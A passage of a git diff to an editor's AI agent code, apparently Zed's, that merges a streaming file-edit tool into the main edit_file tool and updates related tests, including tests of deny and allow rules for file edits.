assert!( - file_content.contains("Hello, Zed!"), - "File should have been edited. Content: {}", - file_content - ); - assert!( - !file_content.contains("Hello, world!"), - "Old content should be replaced. Content: {}", - file_content - ); - - // Verify the tool result was sent back to the model - let pending = fake_model.pending_completions(); - assert!( - !pending.is_empty(), - "Model should have been called with tool result" - ); - - let last_request = pending.last().unwrap(); - let has_tool_result = last_request.messages.iter().any(|m| { - m.content - .iter() - .any(|c| matches!(c, language_model::MessageContent::ToolResult(_))) - }); - assert!( - has_tool_result, - "Tool result should be in the messages sent back to the model" - ); - - // Complete the turn - fake_model.send_last_completion_stream_text_chunk("I've updated the greeting message."); - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::EndTurn)); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - // Verify the thread completed successfully - thread.update(cx, |thread, _cx| { - assert!( - thread.is_turn_complete(), - "Thread should be complete after the turn ends" - ); - }); -} - -#[gpui::test] -async fn test_streaming_edit_json_parse_error_does_not_cause_unsaved_changes( - cx: &mut TestAppContext, -) { - super::init_test(cx); - super::always_allow_tools(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/project"), - json!({ - "src": { - "main.rs": "fn main() {\n println!(\"Hello, world!\");\n}\n" - } - }), - ) - .await; - - let project = project::Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let project_context = cx.new(|_cx| ProjectContext::default()); - let context_server_store = project.read_with(cx, |project, _| project.context_server_store()); - let context_server_registry = - cx.new(|cx| crate::ContextServerRegistry::new(context_server_store.clone(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - model.as_fake().set_supports_streaming_tools(true); - let fake_model = model.as_fake(); - - let thread = cx.new(|cx| { - let mut thread = crate::Thread::new( - project.clone(), - project_context, - context_server_registry, - crate::Templates::new(), - Some(model.clone()), - cx, - ); - let language_registry = project.read(cx).languages().clone(); - thread.add_tool(crate::StreamingEditFileTool::new( - project.clone(), - cx.weak_entity(), - thread.action_log().clone(), - language_registry, - )); - thread - }); - - let _events = thread - .update(cx, |thread, cx| { - thread.send( - UserMessageId::new(), - ["Write new content to src/main.rs"], - cx, - ) - }) - .unwrap(); - cx.run_until_parked(); - - let tool_use_id = "edit_1"; - let partial_1 = LanguageModelToolUse { - id: tool_use_id.into(), - name: EditFileTool::NAME.into(), - raw_input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write" - }) - .to_string(), - input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write" - }), - is_input_complete: false, - thought_signature: None, - }; - fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(partial_1)); - cx.run_until_parked(); - - let partial_2 = LanguageModelToolUse { - id: tool_use_id.into(), - name: EditFileTool::NAME.into(), - raw_input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write", - "content": "fn main() { /* rewritten */ }" - }) - .to_string(), - input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write", - "content": "fn main() { /* rewritten */ }" - }), - is_input_complete: false, - thought_signature: None, - }; - fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(partial_2)); - cx.run_until_parked(); - - // Now send a json parse error. At this point we have started writing content to the buffer. - fake_model.send_last_completion_stream_event( - LanguageModelCompletionEvent::ToolUseJsonParseError { - id: tool_use_id.into(), - tool_name: EditFileTool::NAME.into(), - raw_input: r#"{"display_description":"Rewrite main.rs","path":"project/src/main.rs","mode":"write","content":"fn main() { /* rewritten "#.into(), - json_parse_error: "EOF while parsing a string at line 1 column 95".into(), - }, - ); - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - // cx.executor().advance_clock(Duration::from_secs(5)); - // cx.run_until_parked(); - - assert!( - !fake_model.pending_completions().is_empty(), - "Thread should have retried after the error" - ); - - // Respond with a new, well-formed, complete edit_file tool use. - let tool_use = LanguageModelToolUse { - id: "edit_2".into(), - name: EditFileTool::NAME.into(), - raw_input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write", - "content": "fn main() {\n println!(\"Hello, rewritten!\");\n}\n" - }) - .to_string(), - input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write", - "content": "fn main() {\n println!(\"Hello, rewritten!\");\n}\n" - }), - is_input_complete: true, - thought_signature: None, - }; - fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(tool_use)); - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - let pending_completions = fake_model.pending_completions(); - assert!( - pending_completions.len() == 1, - "Expected only the follow-up completion containing the successful tool result" - ); - - let completion = pending_completions - .into_iter() - .last() - .expect("Expected a completion containing the tool result for edit_2"); - - let tool_result = completion - .messages - .iter() - .flat_map(|msg| &msg.content) - .find_map(|content| match content { - language_model::MessageContent::ToolResult(result) - if result.tool_use_id == language_model::LanguageModelToolUseId::from("edit_2") => - { - Some(result) - } - _ => None, - }) - .expect("Should have a tool result for edit_2"); - - // Ensure that the second tool call completed successfully and edits were applied. - assert!( - !tool_result.is_error, - "Tool result should succeed, got: {:?}", - tool_result - ); - let content_text = tool_result.text_contents(); - assert!( - !content_text.contains("file has been modified since you last read it"), - "Did not expect a stale last-read error, got: {content_text}" - ); - assert!( - !content_text.contains("This file has unsaved changes"), - "Did not expect an unsaved-changes error, got: {content_text}" - ); - - let file_content = fs - .load(path!("/project/src/main.rs").as_ref()) - .await - .expect("file should exist"); - super::assert_eq!( - file_content, - "fn main() {\n println!(\"Hello, rewritten!\");\n}\n", - "The second edit should be applied and saved gracefully" - ); - - fake_model.end_last_completion_stream(); - cx.run_until_parked(); -} diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index d9f451f135d6bf..513ffce0fa9ab0 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -53,7 +53,6 @@ use std::{ }; use util::path; -mod edit_file_thread_test; mod test_tools; use test_tools::*; @@ -6054,13 +6053,14 @@ async fn test_edit_file_tool_deny_rule_blocks_edit(cx: &mut TestAppContext) { cx, ) }); + let action_log = cx.update(|cx| thread.read(cx).action_log.clone()); #[allow(clippy::arc_with_non_send_sync)] let tool = Arc::new(crate::EditFileTool::new( project.clone(), thread.downgrade(), + action_log, language_registry, - templates, )); let (event_stream, _rx) = crate::ToolCallEventStream::test(); @@ -6070,6 +6070,8 @@ async fn test_edit_file_tool_deny_rule_blocks_edit(cx: &mut TestAppContext) { display_description: "Edit sensitive file".to_string(), path: "root/sensitive_config.txt".into(), mode: crate::EditFileMode::Edit, + content: None, + edits: Some(vec![]), }), event_stream, cx, @@ -6486,13 +6488,14 @@ async fn test_edit_file_tool_allow_rule_skips_confirmation(cx: &mut TestAppConte cx, ) }); + let action_log = thread.read_with(cx, |thread, _cx| thread.action_log().clone()); #[allow(clippy::arc_with_non_send_sync)] let tool = Arc::new(crate::EditFileTool::new( project, thread.downgrade(), + action_log, language_registry, - templates, )); let (event_stream, mut rx) = crate::ToolCallEventStream::test(); @@ -6502,6 +6505,8 @@ async fn test_edit_file_tool_allow_rule_skips_confirmation(cx: &mut TestAppConte display_description: "Edit README".to_string(), path: "root/README.md".into(), mode: crate::EditFileMode::Edit, + content: None, + edits: Some(vec![]), }), event_stream, cx, @@ -6554,13 +6559,14 @@ async fn test_edit_file_tool_allow_still_prompts_for_local_settings(cx: &mut Tes cx, ) }); + let action_log = thread.read_with(cx, |thread, _cx| thread.action_log().clone()); #[allow(clippy::arc_with_non_send_sync)] let tool = Arc::new(crate::EditFileTool::new( project, thread.downgrade(), + action_log, language_registry, - templates, )); // Editing a file inside .zed/ should still prompt even with global default: allow, @@ -6572,6 +6578,8 @@ async fn test_edit_file_tool_allow_still_prompts_for_local_settings(cx: &mut Tes display_description: "Edit local settings".to_string(), path: "root/.zed/settings.json".into(), mode: crate::EditFileMode::Edit, + content: None, + edits: Some(vec![]), }), event_stream, cx, diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 7b3eab5d03f9f2..308bc843b1a4f5 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -2,9 +2,9 @@ use crate::{ ContextServerRegistry, CopyPathTool, CreateDirectoryTool, DbLanguageModel, DbThread, DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, FindPathTool, GrepTool, ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool, - RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, StreamingEditFileTool, - SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, - UpdatePlanTool, WebSearchTool, decide_permission_from_settings, + RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, SystemPromptTemplate, Template, + Templates, TerminalTool, ToolPermissionDecision, UpdatePlanTool, WebSearchTool, + decide_permission_from_settings, }; use acp_thread::{MentionUri, UserMessageId}; use action_log::ActionLog; @@ -1544,12 +1544,6 @@ impl Thread { )); self.add_tool(DiagnosticsTool::new(self.project.clone())); self.add_tool(EditFileTool::new( - self.project.clone(), - cx.weak_entity(), - language_registry.clone(), - Templates::new(), - )); - self.add_tool(StreamingEditFileTool::new( self.project.clone(), cx.weak_entity(), self.action_log.clone(), @@ -2865,30 +2859,14 @@ impl Thread { } } - let use_streaming_edit_tool = model.supports_streaming_tools(); - let mut tools = self .tools .iter() .filter_map(|(tool_name, tool)| { - // For streaming_edit_file, check profile against "edit_file" since that's what users configure - let profile_tool_name = if tool_name == StreamingEditFileTool::NAME { - EditFileTool::NAME - } else { - tool_name.as_ref() - }; - if tool.supports_provider(&model.provider_id()) - && profile.is_tool_enabled(profile_tool_name) + && profile.is_tool_enabled(tool_name) { - match (tool_name.as_ref(), use_streaming_edit_tool) { - (StreamingEditFileTool::NAME, false) | (EditFileTool::NAME, true) => None, - (StreamingEditFileTool::NAME, true) => { - // Expose streaming tool as "edit_file" - Some((SharedString::from(EditFileTool::NAME), tool.clone())) - } - _ => Some((truncate(tool_name), tool.clone())), - } + Some((truncate(tool_name), tool.clone())) } else { None } diff --git a/crates/agent/src/tool_permissions.rs b/crates/agent/src/tool_permissions.rs index 2d3638265f758f..48ea6f9e6a6ca7 100644 --- a/crates/agent/src/tool_permissions.rs +++ b/crates/agent/src/tool_permissions.rs @@ -558,9 +558,9 @@ pub fn most_restrictive( #[cfg(test)] mod tests { use super::*; - use crate::AgentTool; use crate::pattern_extraction::extract_terminal_pattern; - use crate::tools::{DeletePathTool, EditFileTool, FetchTool, TerminalTool}; + use crate::tools::{DeletePathTool, FetchTool, TerminalTool}; + use crate::{AgentTool, EditFileTool}; use agent_settings::{AgentProfileId, CompiledRegex, InvalidRegexPattern, ToolRules}; use gpui::px; use settings::{DockPosition, NotifyWhenAgentWaiting, PlaySoundWhenAgentDone}; diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index f3a6ac7ec6d139..e9596d038faff2 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -17,7 +17,6 @@ mod read_file_tool; mod restore_file_from_disk_tool; mod save_file_tool; mod spawn_agent_tool; -mod streaming_edit_file_tool; mod terminal_tool; mod tool_edit_parser; mod tool_permissions; @@ -44,7 +43,6 @@ pub use read_file_tool::*; pub use restore_file_from_disk_tool::*; pub use save_file_tool::*; pub use spawn_agent_tool::*; -pub use streaming_edit_file_tool::*; pub use terminal_tool::*; pub use tool_permissions::*; pub use update_plan_tool::*; diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 85c17c58e8f254..9d5f7953ffff96 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -1,29 +1,40 @@ +mod reindent; +mod streaming_fuzzy_matcher; + use super::restore_file_from_disk_tool::RestoreFileFromDiskTool; use super::save_file_tool::SaveFileTool; -use super::tool_permissions::authorize_file_edit; -use crate::{ - AgentTool, Templates, Thread, ToolCallEventStream, ToolInput, - edit_agent::{EditAgent, EditAgentOutputEvent, EditFormat}, +use super::tool_edit_parser::{ToolEditEvent, ToolEditParser}; +use crate::ToolInputPayload; +use crate::tools::edit_file_tool::{ + reindent::{Reindenter, compute_indent_delta}, + streaming_fuzzy_matcher::StreamingFuzzyMatcher, }; +use crate::{AgentTool, Thread, ToolCallEventStream, ToolInput}; use acp_thread::Diff; -use agent_client_protocol::schema as acp; -use anyhow::{Context as _, Result}; +use action_log::ActionLog; +use agent_client_protocol::schema::{self as acp, ToolCallLocation, ToolCallUpdateFields}; +use anyhow::Result; use collections::HashSet; -use futures::{FutureExt as _, StreamExt as _}; +use futures::FutureExt as _; use gpui::{App, AppContext, AsyncApp, Entity, Task, WeakEntity}; -use indoc::formatdoc; use language::language_settings::{self, FormatOnSave}; -use language::{LanguageRegistry, ToPoint}; -use language_model::{CompletionIntent, LanguageModelToolResultContent}; +use language::{Buffer, LanguageRegistry}; +use language_model::LanguageModelToolResultContent; use project::lsp_store::{FormatTrigger, LspFormatTarget}; -use project::{Project, ProjectPath}; +use project::{AgentLocation, Project, ProjectPath}; use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; +use serde::{ + Deserialize, Deserializer, Serialize, + de::{DeserializeOwned, Error as _}, +}; +use std::ops::Range; use std::path::PathBuf; use std::sync::Arc; +use streaming_diff::{CharOperation, StreamingDiff}; +use text::ToOffset; use ui::SharedString; -use util::ResultExt; use util::rel_path::RelPath; +use util::{Deferred, ResultExt}; const DEFAULT_UI_TEXT: &str = "Editing file"; @@ -37,7 +48,7 @@ const DEFAULT_UI_TEXT: &str = "Editing file"; /// - Use the `list_directory` tool to verify the parent directory exists and is the correct location #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct EditFileToolInput { - /// A one-line, user-friendly markdown description of the edit. This will be shown in the UI and also passed to another model to perform the edit. + /// A one-line, user-friendly markdown description of the edit. This will be shown in the UI. /// /// Be terse, but also descriptive in what you want to achieve with this edit. Avoid generic instructions. /// @@ -67,30 +78,96 @@ pub struct EditFileToolInput { /// `frontend/db.js` /// pub path: PathBuf, + /// The mode of operation on the file. Possible values: - /// - 'edit': Make granular edits to an existing file. - /// - 'create': Create a new file if it doesn't exist. - /// - 'overwrite': Replace the entire contents of an existing file. + /// - 'write': Replace the entire contents of the file. If the file doesn't exist, it will be created. Requires 'content' field. + /// - 'edit': Make granular edits to an existing file. Requires 'edits' field. /// /// When a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch. + #[serde(deserialize_with = "deserialize_maybe_stringified")] pub mode: EditFileMode, + + /// The complete content for the new file (required for 'write' mode). + /// This field should contain the entire file content. + #[serde(default, skip_serializing_if = "Option::is_none")] + pub content: Option, + + /// List of edit operations to apply sequentially (required for 'edit' mode). + /// Each edit finds `old_text` in the file and replaces it with `new_text`. + #[serde( + default, + skip_serializing_if = "Option::is_none", + deserialize_with = "deserialize_maybe_stringified" + )] + pub edits: Option>, +} + +#[derive(Clone, Copy, Debug, Serialize, Deserialize, JsonSchema)] +#[serde(rename_all = "snake_case")] +pub enum EditFileMode { + /// Overwrite the file with new content (replacing any existing content). + /// If the file does not exist, it will be created. + Write, + /// Make granular edits to an existing file + Edit, } +/// A single edit operation that replaces old text with new text +/// Properly escape all text fields as valid JSON strings. +/// Remember to escape special characters like newlines (`\n`) and quotes (`"`) in JSON strings. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct Edit { + /// The exact text to find in the file. This will be matched using fuzzy matching + /// to handle minor differences in whitespace or formatting. + /// + /// Be minimal with replacements: + /// - For unique lines, include only those lines + /// - For non-unique lines, include enough context to identify them + pub old_text: String, + /// The text to replace it with + pub new_text: String, +} + +#[derive(Clone, Default, Debug, Deserialize)] struct EditFileToolPartialInput { #[serde(default)] - path: String, + display_description: Option, + #[serde(default)] + path: Option, + #[serde(default, deserialize_with = "deserialize_maybe_stringified")] + mode: Option, #[serde(default)] - display_description: String, + content: Option, + #[serde(default, deserialize_with = "deserialize_maybe_stringified")] + edits: Option>, } -#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] -#[serde(rename_all = "lowercase")] -#[schemars(inline)] -pub enum EditFileMode { - Edit, - Create, - Overwrite, +#[derive(Clone, Default, Debug, Deserialize)] +pub struct PartialEdit { + #[serde(default)] + pub old_text: Option, + #[serde(default)] + pub new_text: Option, +} + +#[derive(Deserialize)] +#[serde(untagged)] +enum ValueOrJsonString { + Value(T), + String(String), +} + +fn deserialize_maybe_stringified<'de, T, D>(deserializer: D) -> Result +where + T: DeserializeOwned, + D: Deserializer<'de>, +{ + match ValueOrJsonString::::deserialize(deserializer)? { + ValueOrJsonString::Value(value) => Ok(value), + ValueOrJsonString::String(string) => serde_json::from_str::(&string).map_err(|error| { + D::Error::custom(format!("failed to parse stringified value: {error}")) + }), + } } #[derive(Debug, Serialize, Deserialize)] @@ -106,9 +183,23 @@ pub enum EditFileToolOutput { }, Error { error: String, + #[serde(default, skip_serializing_if = "Option::is_none")] + input_path: Option, + #[serde(default, skip_serializing_if = "String::is_empty")] + diff: String, }, } +impl EditFileToolOutput { + pub fn error(error: impl Into) -> Self { + Self::Error { + error: error.into(), + input_path: None, + diff: String::new(), + } + } +} + impl std::fmt::Display for EditFileToolOutput { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { @@ -125,7 +216,24 @@ impl std::fmt::Display for EditFileToolOutput { ) } } - EditFileToolOutput::Error { error } => write!(f, "{error}"), + EditFileToolOutput::Error { + error, + diff, + input_path, + } => { + write!(f, "{error}\n")?; + if let Some(input_path) = input_path + && !diff.is_empty() + { + write!( + f, + "Edited {}:\n\n```diff\n{diff}\n```", + input_path.display() + ) + } else { + write!(f, "No edits were made.") + } + } } } } @@ -137,42 +245,215 @@ impl From for LanguageModelToolResultContent { } pub struct EditFileTool { + project: Entity, thread: WeakEntity, + action_log: Entity, language_registry: Arc, - project: Entity, - templates: Arc, +} + +enum EditSessionResult { + Completed(EditSession), + Failed { + error: String, + session: Option, + }, } impl EditFileTool { pub fn new( project: Entity, thread: WeakEntity, + action_log: Entity, language_registry: Arc, - templates: Arc, ) -> Self { Self { project, thread, + action_log, language_registry, - templates, } } fn authorize( &self, - input: &EditFileToolInput, + path: &PathBuf, + description: &str, event_stream: &ToolCallEventStream, cx: &mut App, ) -> Task> { - authorize_file_edit( - Self::NAME, - &input.path, - &input.display_description, + super::tool_permissions::authorize_file_edit( + EditFileTool::NAME, + path, + description, &self.thread, event_stream, cx, ) } + + fn set_agent_location(&self, buffer: WeakEntity, position: text::Anchor, cx: &mut App) { + let should_update_agent_location = self + .thread + .read_with(cx, |thread, _cx| !thread.is_subagent()) + .unwrap_or_default(); + if should_update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location(Some(AgentLocation { buffer, position }), cx); + }); + } + } + + async fn ensure_buffer_saved(&self, buffer: &Entity, cx: &mut AsyncApp) { + let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { + let settings = language_settings::LanguageSettings::for_buffer(buffer, cx); + settings.format_on_save != FormatOnSave::Off + }); + + if format_on_save_enabled { + self.project + .update(cx, |project, cx| { + project.format( + HashSet::from_iter([buffer.clone()]), + LspFormatTarget::Buffers, + false, + FormatTrigger::Save, + cx, + ) + }) + .await + .log_err(); + } + + self.project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) + .await + .log_err(); + + self.action_log.update(cx, |log, cx| { + log.buffer_edited(buffer.clone(), cx); + }); + } + + async fn process_streaming_edits( + &self, + input: &mut ToolInput, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> EditSessionResult { + let mut session: Option = None; + let mut last_partial: Option = None; + + loop { + futures::select! { + payload = input.next().fuse() => { + match payload { + Ok(payload) => match payload { + ToolInputPayload::Partial(partial) => { + if let Ok(parsed) = serde_json::from_value::(partial) { + let path_complete = parsed.path.is_some() + && parsed.path.as_ref() == last_partial.as_ref().and_then(|partial| partial.path.as_ref()); + + last_partial = Some(parsed.clone()); + + if session.is_none() + && path_complete + && let EditFileToolPartialInput { + path: Some(path), + display_description: Some(display_description), + mode: Some(mode), + .. + } = &parsed + { + match EditSession::new( + PathBuf::from(path), + display_description, + *mode, + self, + event_stream, + cx, + ) + .await + { + Ok(created_session) => session = Some(created_session), + Err(error) => { + log::error!("Failed to create edit session: {}", error); + return EditSessionResult::Failed { + error, + session: None, + }; + } + } + } + + if let Some(current_session) = &mut session + && let Err(error) = current_session.process(parsed, self, event_stream, cx) + { + log::error!("Failed to process edit: {}", error); + return EditSessionResult::Failed { error, session }; + } + } + } + ToolInputPayload::Full(full_input) => { + let mut session = if let Some(session) = session { + session + } else { + match EditSession::new( + full_input.path.clone(), + &full_input.display_description, + full_input.mode, + self, + event_stream, + cx, + ) + .await + { + Ok(created_session) => created_session, + Err(error) => { + log::error!("Failed to create edit session: {}", error); + return EditSessionResult::Failed { + error, + session: None, + }; + } + } + }; + + return match session.finalize(full_input, self, event_stream, cx).await { + Ok(()) => EditSessionResult::Completed(session), + Err(error) => { + log::error!("Failed to finalize edit: {}", error); + EditSessionResult::Failed { + error, + session: Some(session), + } + } + }; + } + ToolInputPayload::InvalidJson { error_message } => { + log::error!("Received invalid JSON: {error_message}"); + return EditSessionResult::Failed { + error: error_message, + session, + }; + } + }, + Err(error) => { + return EditSessionResult::Failed { + error: format!("Failed to receive tool input: {error}"), + session, + }; + } + } + } + _ = event_stream.cancelled_by_user().fuse() => { + return EditSessionResult::Failed { + error: "Edit cancelled by user".to_string(), + session, + }; + } + } + } + } } impl AgentTool for EditFileTool { @@ -181,6 +462,10 @@ impl AgentTool for EditFileTool { const NAME: &'static str = "edit_file"; + fn supports_input_streaming() -> bool { + true + } + fn kind() -> acp::ToolKind { acp::ToolKind::Edit } @@ -203,25 +488,25 @@ impl AgentTool for EditFileTool { .unwrap_or(input.path.to_string_lossy().into_owned()) .into(), Err(raw_input) => { - if let Some(input) = - serde_json::from_value::(raw_input).ok() - { - let path = input.path.trim(); + if let Ok(input) = serde_json::from_value::(raw_input) { + let path = input.path.unwrap_or_default(); + let path = path.trim(); if !path.is_empty() { return self .project .read(cx) - .find_project_path(&input.path, cx) + .find_project_path(&path, cx) .and_then(|project_path| { self.project .read(cx) .short_full_path_for_project_path(&project_path, cx) }) - .unwrap_or(input.path) + .unwrap_or_else(|| path.to_string()) .into(); } - let description = input.display_description.trim(); + let description = input.display_description.unwrap_or_default(); + let description = description.trim(); if !description.is_empty() { return description.to_string().into(); } @@ -234,275 +519,46 @@ impl AgentTool for EditFileTool { fn run( self: Arc, - input: ToolInput, + mut input: ToolInput, event_stream: ToolCallEventStream, cx: &mut App, ) -> Task> { cx.spawn(async move |cx: &mut AsyncApp| { - let input = input.recv().await.map_err(|e| EditFileToolOutput::Error { - error: format!("Failed to receive tool input: {e}"), - })?; - - let project = self - .thread - .read_with(cx, |thread, _cx| thread.project().clone()) - .map_err(|_| EditFileToolOutput::Error { - error: "thread was dropped".to_string(), - })?; - - let (project_path, abs_path, allow_thinking, update_agent_location, authorize) = - cx.update(|cx| { - let project_path = resolve_path(&input, project.clone(), cx).map_err(|err| { - EditFileToolOutput::Error { - error: err.to_string(), - } - })?; - let abs_path = project.read(cx).absolute_path(&project_path, cx); - if let Some(abs_path) = abs_path.clone() { - event_stream.update_fields( - acp::ToolCallUpdateFields::new() - .locations(vec![acp::ToolCallLocation::new(abs_path)]), - ); - } - let allow_thinking = self - .thread - .read_with(cx, |thread, _cx| thread.thinking_enabled()) - .unwrap_or(true); - - let update_agent_location = self.thread.read_with(cx, |thread, _cx| !thread.is_subagent()).unwrap_or_default(); - - let authorize = self.authorize(&input, &event_stream, cx); - Ok::<_, EditFileToolOutput>((project_path, abs_path, allow_thinking, update_agent_location, authorize)) - })?; - - let result: anyhow::Result = async { - authorize.await?; - - let (request, model, action_log) = self.thread.update(cx, |thread, cx| { - let request = thread.build_completion_request(CompletionIntent::ToolResults, cx); - (request, thread.model().cloned(), thread.action_log().clone()) - })?; - let request = request?; - let model = model.context("No language model configured")?; - - let edit_format = EditFormat::from_model(model.clone())?; - let edit_agent = EditAgent::new( - model, - project.clone(), - action_log.clone(), - self.templates.clone(), - edit_format, - allow_thinking, - update_agent_location, - ); - - let buffer = project - .update(cx, |project, cx| { - project.open_buffer(project_path.clone(), cx) - }) - .await?; - - // Check if the file has been modified since the agent last read it - if let Some(abs_path) = abs_path.as_ref() { - let last_read_mtime = action_log.read_with(cx, |log, _| log.file_read_time(abs_path)); - let (current_mtime, is_dirty, has_save_tool, has_restore_tool) = self.thread.read_with(cx, |thread, cx| { - let current = buffer.read(cx).file().and_then(|file| file.disk_state().mtime()); - let dirty = buffer.read(cx).is_dirty(); - let has_save = thread.has_tool(SaveFileTool::NAME); - let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); - (current, dirty, has_save, has_restore) - })?; - - // Check for unsaved changes first - these indicate modifications we don't know about - if is_dirty { - let message = match (has_save_tool, has_restore_tool) { - (true, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (true, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask the user to manually revert the file, then inform you when it's ok to proceed." - } - (false, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask the user to manually save the file, then inform you when it's ok to proceed. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (false, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes, \ - then ask them to save or revert the file manually and inform you when it's ok to proceed." - } - }; - anyhow::bail!("{}", message); - } - - // Check if the file was modified on disk since we last read it - if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) { - // MTime can be unreliable for comparisons, so our newtype intentionally - // doesn't support comparing them. If the mtime at all different - // (which could be because of a modification or because e.g. system clock changed), - // we pessimistically assume it was modified. - if current != last_read { - anyhow::bail!( - "The file {} has been modified since you last read it. \ - Please read the file again to get the current state before editing it.", - input.path.display() - ); - } - } - } - - let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); - event_stream.update_diff(diff.clone()); - let _finalize_diff = util::defer({ - let diff = diff.downgrade(); - let mut cx = cx.clone(); - move || { - diff.update(&mut cx, |diff, cx| diff.finalize(cx)).ok(); - } - }); - - let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let old_text = cx - .background_spawn({ - let old_snapshot = old_snapshot.clone(); - async move { Arc::new(old_snapshot.text()) } + match self + .process_streaming_edits(&mut input, &event_stream, cx) + .await + { + EditSessionResult::Completed(session) => { + self.ensure_buffer_saved(&session.buffer, cx).await; + let (new_text, diff) = session.compute_new_text_and_diff(cx).await; + Ok(EditFileToolOutput::Success { + old_text: session.old_text.clone(), + new_text, + input_path: session.input_path, + diff, }) - .await; - - let (output, mut events) = if matches!(input.mode, EditFileMode::Edit) { - edit_agent.edit( - buffer.clone(), - input.display_description.clone(), - &request, - cx, - ) - } else { - edit_agent.overwrite( - buffer.clone(), - input.display_description.clone(), - &request, - cx, - ) - }; - - let mut hallucinated_old_text = false; - let mut ambiguous_ranges = Vec::new(); - let mut emitted_location = false; - loop { - let event = futures::select! { - event = events.next().fuse() => match event { - Some(event) => event, - None => break, - }, - _ = event_stream.cancelled_by_user().fuse() => { - anyhow::bail!("Edit cancelled by user"); - } - }; - match event { - EditAgentOutputEvent::Edited(range) => { - if !emitted_location { - let line = Some(buffer.update(cx, |buffer, _cx| { - range.start.to_point(&buffer.snapshot()).row - })); - if let Some(abs_path) = abs_path.clone() { - event_stream.update_fields(acp::ToolCallUpdateFields::new().locations(vec![acp::ToolCallLocation::new(abs_path).line(line)])); - } - emitted_location = true; - } - }, - EditAgentOutputEvent::UnresolvedEditRange => hallucinated_old_text = true, - EditAgentOutputEvent::AmbiguousEditRange(ranges) => ambiguous_ranges = ranges, - EditAgentOutputEvent::ResolvingEditRange(range) => { - diff.update(cx, |card, cx| card.reveal_range(range.clone(), cx)); - } - } - } - - output.await?; - - let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { - let settings = language_settings::LanguageSettings::for_buffer(buffer, cx); - settings.format_on_save != FormatOnSave::Off - }); - - if format_on_save_enabled { - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - - let format_task = project.update(cx, |project, cx| { - project.format( - HashSet::from_iter([buffer.clone()]), - LspFormatTarget::Buffers, - false, // Don't push to history since the tool did it. - FormatTrigger::Save, - cx, - ) - }); - format_task.await.log_err(); } - - project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) - .await?; - - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - - let new_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let (new_text, unified_diff) = cx - .background_spawn({ - let new_snapshot = new_snapshot.clone(); - let old_text = old_text.clone(); - async move { - let new_text = new_snapshot.text(); - let diff = language::unified_diff(&old_text, &new_text); - (new_text, diff) - } + EditSessionResult::Failed { + error, + session: Some(session), + } => { + self.ensure_buffer_saved(&session.buffer, cx).await; + let (_new_text, diff) = 